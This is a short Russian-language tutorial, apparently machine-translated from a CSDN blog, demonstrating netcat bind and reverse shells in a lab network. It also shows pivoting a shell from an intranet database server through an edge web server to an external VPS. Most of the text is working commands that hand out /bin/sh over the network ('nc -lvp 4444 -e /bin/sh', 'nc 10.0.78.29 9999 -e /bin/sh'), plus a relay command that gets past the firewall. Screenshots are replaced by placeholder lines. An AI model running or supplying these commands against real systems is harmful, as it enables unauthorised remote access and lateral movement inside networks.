Используйте netcat в интрасети, чтобы заставить оболочку двигаться вперед и назад

В этой демонстрации в среде Linux,
когда внешняя сетевая машина обычно используется для доступа к внутренней сетевой машине, часто используется обратная оболочка. Прямая оболочка часто используется между внутренней сетевой машиной и внутренней сетевой машиной.
Прямая оболочка
связана с внутренней сетью и граничным сервером. Поэтому сначала мы продемонстрируем прямую оболочку (прямая оболочка предназначена для мониторинга на целевой машине):
Команда на машине интрасети: nc -lvp 4444 -e / bin / sh
Команда на локальный компьютер: nc 10.0.78.41 4444
Вставьте описание изображения сюда

Показать уже подключенные,
чтобы проверить:
Вставьте описание изображения сюда

Это означает, что прямое соединение прошло успешно.
Обратная оболочка
должна отслеживать локальный vps и подключаться к целевой
машине. Команда на локальном компьютере: nc -lvp 9999
Команда на внутренней сетевой машине: nc 10.0.78.29 9999 -e / bin / sh
Вставьте описание изображения сюда

Показать уже подключенные,
чтобы проверить:
Вставьте описание изображения сюда

Объясните, что обратное соединение прошло успешно.
Затем потренируйтесь на удаленной внутренней сетевой машине с обратной оболочкой на внешней сетевой машине, используя пограничный сервер в качестве трамплина.
Условия подготовки:
1. Внешняя сетевая машина (vps)
2. Граничный сервер (веб-сервер )
3. Интранет-сервер (сервер базы данных)
Vps и веб-сервер, сервер базы данных разделен IP-адресом брандмауэра: 192.168.101.1, и
каждый IP-адрес выглядит следующим образом:
1. Внешний сетевой компьютер (vps)
Вставьте описание изображения сюда

2. Пограничный сервер (веб-сервер)

Вставьте описание изображения сюда

3. Интранет-сервер (сервер базы данных)

Вставьте описание изображения сюда

Затем
введите команду в vps: nc -lvp 1234
Введите команду на сервере базы данных: nc -lvp 1234 -e / bin / sh
Введите команду на веб-сервере: nc -v 10.0.78.29 1234 -c "nc - v 192.168.101.103 1234 "
Вставьте описание изображения сюда

Показать уже подключенные,
чтобы проверить:
Вставьте описание изображения сюда

Обнаружено, что IP-адрес является IP-адресом сервера базы данных на данный момент, успех

рекомендация

отblog.csdn.net/bring_coco/article/details/110822147